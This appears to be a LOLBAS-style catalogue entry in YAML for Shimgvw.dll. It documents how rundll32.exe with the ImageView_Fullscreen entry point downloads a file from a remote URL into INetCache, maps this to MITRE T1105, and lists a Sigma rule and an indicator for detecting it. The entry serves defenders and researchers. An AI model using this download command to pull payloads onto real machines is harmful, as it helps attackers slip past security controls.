---
Name: Shimgvw.dll
Description: Photo Gallery Viewer
Author: Eral4m
Created: 2021-01-06
Commands:
  - Command: rundll32.exe c:\Windows\System32\shimgvw.dll,ImageView_Fullscreen {REMOTEURL:.exe}
    Description: Once executed, rundll32.exe will download the file at the URL in the command to INetCache. Can also be used with entrypoint 'ImageView_FullscreenA'.
    Usecase: Download file from remote location.
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Download: INetCache
Full_Path:
  - Path: c:\windows\system32\shimgvw.dll
  - Path: c:\windows\syswow64\shimgvw.dll
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml
  - IOC: Execution of rundll32.exe with 'ImageView_Fullscreen' and a protocol handler ('://') on the command line
Resources:
  - Link: https://twitter.com/eral4m/status/1479080793003671557
Acknowledgement:
  - Person: Eral4m
    Handle: '@eral4m'
